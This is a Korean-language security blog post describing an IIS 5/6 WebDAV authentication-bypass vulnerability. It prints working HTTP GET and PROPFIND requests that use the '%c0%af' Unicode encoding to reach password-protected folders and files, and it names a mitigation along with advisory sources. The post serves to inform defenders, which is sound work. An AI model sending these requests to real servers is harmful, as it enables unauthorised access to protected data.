5월 18일 오늘(미국 기준), IIS 5/6의 WebDAV에서 보안 인증을 우회하는 취약점이 발견되었습니다.
보안에 관심을 가지고 계신 분이라면 WebDAV 취약점은 지난 2001년도에 IIS 4/5에서 발생한 MS01-26이 생각날 수도 있습니다. 이는 폴더 이름에 사용되는 문자에 유니코드로 인코딩하는 것을 지원하면서 발생한 것으로 가장 대표적인 것이 "../.."을 "..%c0%af.."로 인코딩하게 되면 보안 권한 검사를 거치지 않고 곧바로 파일에 액세스할 수 있게 된 문제점입니다.
하여튼, 이 번에 새로 발견된 WebDAV 취약점을 통해 공격자는 비밀번호로 잠근 디렉터리를 액세스하거나 파일을 다운로드 또는 업로드할 수 있습니다. Nicolas Rangos에 따르면 WebDAV의 작업 폴더가 아닌 IIS 전체의 폴더에 취약점이 노출되어 있다고 합니다. 원인은 유니코드 문제를 처리하는 과정에서 발생한다고 합니다.
아래와 같이 비밀번호로 보호되는 폴더의 파일을 GET 명령어를 통해 요청을 하게 되면 인증을 거치치 않고 접근이 가능하게 됩니다.
GET /..%c0%af/protected/protected.zip HTTP/1.1Translate: fConnection: closeHost: servername
"/" 문자는 %c0%af 라는 유니코드 값으로 인코딩되어 /protected/protected.zip 파일에 접근할 수 있게 됩니다. 또한, Translate:f 옵션을 통해 WebDAV의 기능으로 디렉터리를 접글할 수 있습니다.
또한 WebDAV 폴더에 대한 공격은 약간 더 복잡하지만 다음과 같은 방법으로 업로드나 다운로드가 가능합니다.
PROPFIND /protec%c0%afted/ HTTP/1.1Host: servernameUser-Agent: neo/0.12.2Connection: TETE: trailersDepth: 1Content-Length: 288Content-Type: application/xml<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>
다행인 점은 일부 IIS 7에서는 WebDAV에 관련된 취약점이 발생하지 않는 다는 것입니다.
아직 이 문제점에 대한 해결책은 나와 있지 않지만 가장 좋은 방법은 WebDAV를 일시적으로 중지하는 것입니다.
자료출처: http://secunia.com/advisories/35109/
MS 자료: http://www.microsoft.com/technet/security/advisory/971492.mspx